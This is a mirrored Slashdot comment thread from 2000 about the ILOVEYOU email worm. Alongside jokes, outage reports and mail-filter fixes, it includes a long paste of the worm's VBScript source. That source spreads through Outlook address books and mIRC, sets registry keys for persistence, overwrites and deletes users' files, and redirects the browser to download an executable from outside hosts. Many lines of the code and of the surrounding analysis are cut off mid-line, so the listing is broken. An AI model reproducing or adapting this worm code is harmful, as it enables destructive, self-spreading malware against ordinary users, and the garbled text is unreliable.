Slashdot Mirror
I Love You "Virus" Hates Everyone
Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. Its not really a virus: its a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destorying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys. Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a
better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so its not for everyone.
I have Outlook 2000 open as we speak.
So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.
But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.
As far as i know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (Including many millitary installations as well).
Sites I've found that offer disenfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,8875 4-421758,00.html, as well as http://www.f-source.com
good luck people
Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.
UNIX would not have a problem here..
Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.
People still have to be dumb enough to open the attachment.
-- jaf
The nice thing about virus's like this is you find out about people you never met who have you in their address book....at least in my case. -Pete
Soccer Goal Plans
This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companys really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.
The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!
Got Rhinos?
OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...
:-)
Personally, I loved the quote from the journalist who said that she was suspicious when she received 5 copies of it, but since the last one was from Dow Jones, she opened it anyway...
---
---
"Go Metallica. Die RIAA." -- Linus Torvalds
header_checks = regexp:/etc/postfix/header_checks
Add the following line in /etc/postfix/header_checks:
This will reject mails containing this subject.
Thanks to Claus Guttesen who posted this on the postfix mailling list.
It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what is does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt
I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.
It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others
This actually managed to knock out half of our office , as well as render one of our live web servers pretty messed up , within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share
And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.
-- Oh Well
Either that, or people need to stop using the address books, which are for lusers anyway! :o)
Got Rhinos?
My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.
I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!
This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the senders name to a data file included with the virus.
The recipient then falls into one of three classes:
1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, recieved handy list of idiot coworkers.
This list can be used in a multitude of ways:
1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
The only love letter I've ever gotten... and I can't open it....
Ceci n'est pas une sig.
Sorry - lost the /n's there
u rrentVersion\Run\MSKernel32 u rrentVersion\RunServices\Win32DLL
/WINNT/SYSTEM32/WInFAT32.exe exists - if it does
.exe to be run at next boot and resets i.e home page to about:blank (blank page)
.vbs and .vbe files it finds with itself .mp3, .mp2, .jpg, .jpeg
It's a VBS worm. It spreads by two methods, irc and email.
On startup it sets the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
to 0
It then copies itself to WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT
It then creates registry keys
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C
which will run the script again on the next boot of the computer
Next it checks to see if ie download directory is set in the registry
- if it is it remembers that value, otherwise it uses c:\ instead.
It then checks to see it
it sets internet explorers start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net
It then checks to see it this file has been downloaded (i.e. when the script is run at a later date). If it has to sets this
Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM
This basically contains the worm itself set to run when the page is
viewed.
Now it does to old trick of openning the Outlook address book, grabbing
*all* the entries in it and emailing then an email with the subject line "ILOVEYOU" and the worm as an attachment.
Now it has a look around all the drives on the machine (local drives I think) as does the following
a) If it find mirc, edits it's ini file so when you next log onto an
irc channel it dcc's itself to all the other users
b) Overwrites any
c) If it finds any vbs, vbe, css,, wsh, sct or hta files it deletes them,
creates a new file with the same name ending in vbs and copies itself to
it
d) Does similar things to (c) to
Then the script ends
Stuart
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,reg
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Softwar
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwa
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FO
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malea
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read this HTML fileh r(91)) c hr(93)) h r(37)) Y OU.HTM") U .HTM",2)
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+c
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+c
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YO
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Stop being so arrogant. It's just an executable attachment.
For a linux version just write a bash script that'll read the users address book and send it on aswell.
This is one reason NOT to want world domination. In that case it'll spread easily
------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -
OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...
As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.
Now *that* is crappy design...
--
Early this morning, in response to the virus, the AP had the following report about Microsoft:
--
SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"
"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."
"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."
--
Sargent
What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.
e virus sounds sufficiently scary, it gets lots of media coverage.
I think it's seen as being an easy way evil hackers can get at your machine, especially as people (and the media) don't seem to realise that the user has to open the email - it doesn't happen automatically. And, as an automatic it-comes-from-cyberspace-to-take-over-your-machin
From the MSNBC article:
X 11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??
"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."
Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.
"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected." (emphasis mine)
The acticle even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".
Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-
I mean, I'm joking of course.
Or at least I think I'm joking...
My office got it this morning.
Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
The Cure of the ills of Democracy is more Democracy.
Erlang Developer and podcaster
I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.
That should be the standard approach at any site that runs Windows.
Not true.
The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.
Of course, your typical unix user probably wouldnt run such a file, but that isnt an application design issue.
So let me get this right, Microsoft directly e-mails the virus to you, then goes over to your computer and forcibly opens the attachment? Wow! In that case, can they come over and cook me dinner while they're at it? I'd like roast linux fool, medium rare.
Our company IT head sent out a Melissa warning at 12am one day. 3am rolled around and I had 3 copies of it already, two from the same person.
Ahh, the joys of Eudora on a Mac. I just sat back and laughed.
Pope
Freedom is Slavery! Ignorance is Strength! Monopolies offer Choice!
It doesn't mean much now, it's built for the future.
So what is it and what does it do?
It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).
It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()
It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).
Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.
Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup
builds a webpage and displays it, including a request for the user to disable ActiveX security.
If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.
Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.
It's hit 340 lists at our firm so far.
TomV
This will work, it might delete some legit files but it's better then reinstalling. This thing doesn't appear to be THAT bad. Remain calm and do what the man says.
/does/ anyway?
does anybody know what the MS-BUGFIX.EXE file
Many people in our company recieved the message, but because of the signs posted everywhere most of us around here didn't open the message. Right now I've got Outlook Express open and logged in to the exchange server through IMAP. I don't know how much that'll help, but I can always hope, can't I? Hell, at least I'm reading the really important email (stuff from my wife) through my ssh session with my server at home. I know Pine isn't susceptible to that shit.
since we use Outlook/Exchange for mail after migrating (partially) away from Novell and Groupwise...never mind that there's a large Mac presence at NIH, and the Mac client is way lame and not compatible with the Windows version (yet).
Some of this was my employer's idea, as well. (The migration, not the virus.)
Basically, even though 90% of the machines I support are not affected, everybody has to go without mail because they've turned off the Exchange server. I FUCKING FUCKING FUCKING hate Outlook!
I use Macs for work, Linux for education, and Windows for cardplaying.
Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:
n \MSKernel32 [created to run MSKernel32.vbs]n Services\Win32DLL [created to run Win32DLL.vbs]n \WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
.exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.
Files created/edited:
MSKernel32.vbs [created in System folder, copy of worm]
Win32DLL.vbs [created in Windows folder, copy of worm]
LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
WIN-BUGSFIX.exe [downloaded into default IE download folder]
WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
*.vbs, *.vbe [overwritten with copy of worm]
*.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
*.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
*.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]
Registry keys created/edited:
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
HKLM\Software\Microsoft\Windows\CurrentVersion\Ru
HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]
From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).
I'm not sure about the
Other info: the file orginates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'
Especially when they make you admin NT servers.
/. crew are stuck in the same position as I am, dictated to by corporate or institutional policy. It's not necessarily a matter of coming out of the closet, but of frowning, lowering your head and mumbling about the boss.
I would imagine that a great number of the
"Share your knowledge. It's a way to achieve immortality." -- Dalai Lama
Just after that previous post, I went to delete those 16 messages from my deleted items folder... as soon as I selected the first message, the preview pane failed to appear. I immediately jumped to the task manager and saw "Virus - Running". I killed that and Outlook, which had stopped responding. As far as I can tell, nothing was sent, and none of my files were changed.
What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used alot of the VB possibilities you find in Office. The espescially build a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. Alot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that would refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)
What I meant to say was that in stead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is alot safer and gives companies the same ease of use of integrating it into their organisation.
Use Adsense for Charity
I think System Administrators should send a similar e-mail as this one every once in a while to all their users.
:)
An unharmfull version of it, that is, which only sends a reply back to the administrator. This way, he/she can warn the user for not ever opening anything he/she does know know of.
Of course, the administrator will have to fake his e-mail addy, but that shouldn't be hard
Just an idea... don't count on the web becoming virus-less... take countermeasurements.
Too bad MS didn't include antivirus with the OS instead of IE.
love is just extroverted narcissism
You'll receive it from Outlook users, it'll mess with a variety of filetypes and offer them on mIRC if you've got it installed, but it won't propagate, since it uses
to get at the Address book.Open source viruses, eh?
TomV
simply because they've royally pissed off enough technically adept folks and are such a large target - if the DOJ/Courts doesn't take care of their unfair trading practices, the underground assassins will.
Something along the lines of the devil's dictionary of an absolute monarch: He can do anything he pleases, so long as he pleases the assassins.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
From the article:
Visual Basic files used by webmasters
I feel that anyone calling themselves a master of the web, but who uses VB, probably has some issues.
--
E_NOSIG
There is a really quite simple fix for this, it comes down to basic security that should be praticed at all times. For example, this worm (among others) spreads it's disease though the use of the address book in outlook express.
This address book contants email addresses that the person enjoys send/receiving email with. You could say, the address contains a list of "freinds" to the user. The best way to fix being "labeled" as a "freind" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.
Also since this is spread though the use of outlook express, which is an email program. Email programs are used to communicate between to users or person. I can only conclude that communication between humans, in any form is a major security risk and should be stoped.
The two basic security prinicpals we learned here, is
1) communication between humans is bad and should not be allowed
2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communicatioins with you.
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
There is an article and already an update.
I've not looked thoroughly (just a quick look with a disassembler at parts of it), so the following is incomplete, but among other things, it looks as though it can:
It seems incredibly poorly written. For example, lots of functions return a char* pointing to a local array. Extra padding arrays are added in an attempt to stop the stack from getting overwritten before the value is used.
Nice to see some innovation at work here...
Microsoft: Don't Innovate, Regurgitate!
Oh, great.
WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.
The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.
The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.
We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.
-----
Go ahead, blame me... I voted for Nader!
our sendmail Guru put the following in our
/etc/procmailrc:
:0
*Subject: (ILOVEYOU|INEEDYOU)
/home/mail/virus-slr
:0c
of course, you may wish to change the location of the file that all the mails are diverted to.
This will forward all the emails with the subject of ILOVEYOU or INEEDYOU into the file virus-slr.
so far - its a 12Mb file!
Moderators, please moderate the parent up! Thanks for posting it, it works great. We've now re-enabled external email and it's bounced about a million virus emails so far...
Pete.
You will need to install the evaluation edition of Dr. Solomons, then the extra virus .sig to get it to work, though, but it's a start. Solutions from your favourite AV vendor should be appearing Real Soon Now.
Now, here's hoping a benevolent moderator passes by and mods the parent of this up where it belongs.
This is on topic, but it's going to take me a bit to get to it. Moderators, have faith :) .XLS | .PPT) files" .DOC attachments in their mail, and having a macro virus attack them. :)
One of the reasons that the government thinks it'd be a good thing to break Microsoft up the way they want to, is that without having an OS division, MS-Apps would do things like port Office to Linux.
Red Hat, among others, sees this as a good thing, since the #1 reason they get for people not wanting to switch over to linux is "I can't use my (.DOC |
I think about the porting of Office to Linux and see many others adopting Linux as a result. I then see clueless newbies who run as root all the time opening
And if MS-Apps ports Office over, why not Outlook? Right now, most folks think it's fairly rare to see a virus on Linux. If Microsoft ports Office/Outlook over, and clueless newbies/managers get ahold of it, the scarcity of viruses for Linux will vanish.
I can see the headlines now: "Melissa ported to Linux!"
I think I'll stick to Pine
-Denor
Hm, now that I got a love letter from my boss, can I sue him for sexual harrassment and make big cash? ;)
[Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]
This message is provided under the terms outlined at http://www.bero.org/terms.html
That's simple. They work for one of the many corporations whose CIO has been assimilated by Microsoft, resulting in the mandatory use of Microsoft Windows, Office and Exchange. If you use Exchange for a mail server, you need Outlook on the client machines. My company recently "upgraded" from MS Mail to Exchange. The LAN Admins installed Outlook on every user's PC. I asked them why they didn't install some UNIX POP3 servers and save a ton of money. They said the deployment of Exchange was corporate policy, at the highest level.
Mea navis aericumbens anguillis abundat
Taking a biological view of it, you can see that what many trumpet as "standardization of platform" may create efficiencies for developers, but also for viruses. Any biologist knows that a genetic monoculture is subject to sudden and massive extinction. Imagine a virus that simply and truly wiped disks clean of windows; that it was 100% virulent and contagious; if not for non-windows users, there could be no computers left running. Or take the recent hacking of AboveNet; it was characterized as a denial of service attack, but it wasn't bandwidth flood. It seems to have been something that allowed routers to be taken down; it's easy to see that the severity of the assault would be proportional to the uniformity of their routers.
Vive la difference or die.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
Expanding a vast wasteland since 1996.
That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propogate.
It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...
Jeremy, your friendly Slashdot anti-M$ zealot
I don't care if it's 90,000 hectares. That lake was not my doing.
Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs . Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)
-brennan
I found this news article only just a few minutes ago...
WASHINGTON:
U.S. District Judge Thomas Penfield Jackson has issued a ruling in the Microsoft VS the Department Of Justice case regaring the breakup of Microsoft into 2 or possibly 3 'Baby Bills'.
Judge Jackson was quoted as saying, "Only moments ago, I received a rather bizaar email from Mr. Gates, titled as "I LOVE YOU" in the subject line. At first, I thought it was perhaps just another plea to 'let [him] innovate', but after opening the attachment, I found myself infected with a virus. I am very upset with Mr. Gates."
The breakup is to proceed immediatly.
Here in my data center, I still sometimes hear the refrain from the mainframers; "but Unix can't handle the I/O!".
;)
Little do they know that the EMC disk arrays that handle the mainframe storage are all Unix boxes themselves.
Geeky modern art T-shirts
Caution and warning.
This trojan will propagate to FAX machines, if the machine is a contact in the Outlook address book.
It doesn't just eat bandwidth, it eats paper and phone connections too.
-- What you do today will cost you a day of your life.
I sent out an email telling users of this virus and warning outlook is to be uninstalled on all systems. We use something else for email.
So what to the id10ts do? They double click on an outlook icon and in some cases reinstall it to see what all the fuss is about!
--- If you don't want to know the answer, don't ask the question.
For any of you protecting your Exchange 5.5 server with Norton Antivirus (Symantec), there are signatures here. They aren't tested or approved, AFAIK, but they're working at my location. It won't repair the file but will quarantine bad attachments. You might want to keep the server off your network while you do this. Stop your store while you're copying the signature file to your server, then pull your ethernet cable when you want to start it again to run NAV.
n tivirus_definitions/norton_antivirus/spe cdef
That url is ftp://ftp.symantec.com/public/english_us_canada/a
At least it's open source.
The first, last, and only tech news site on the net
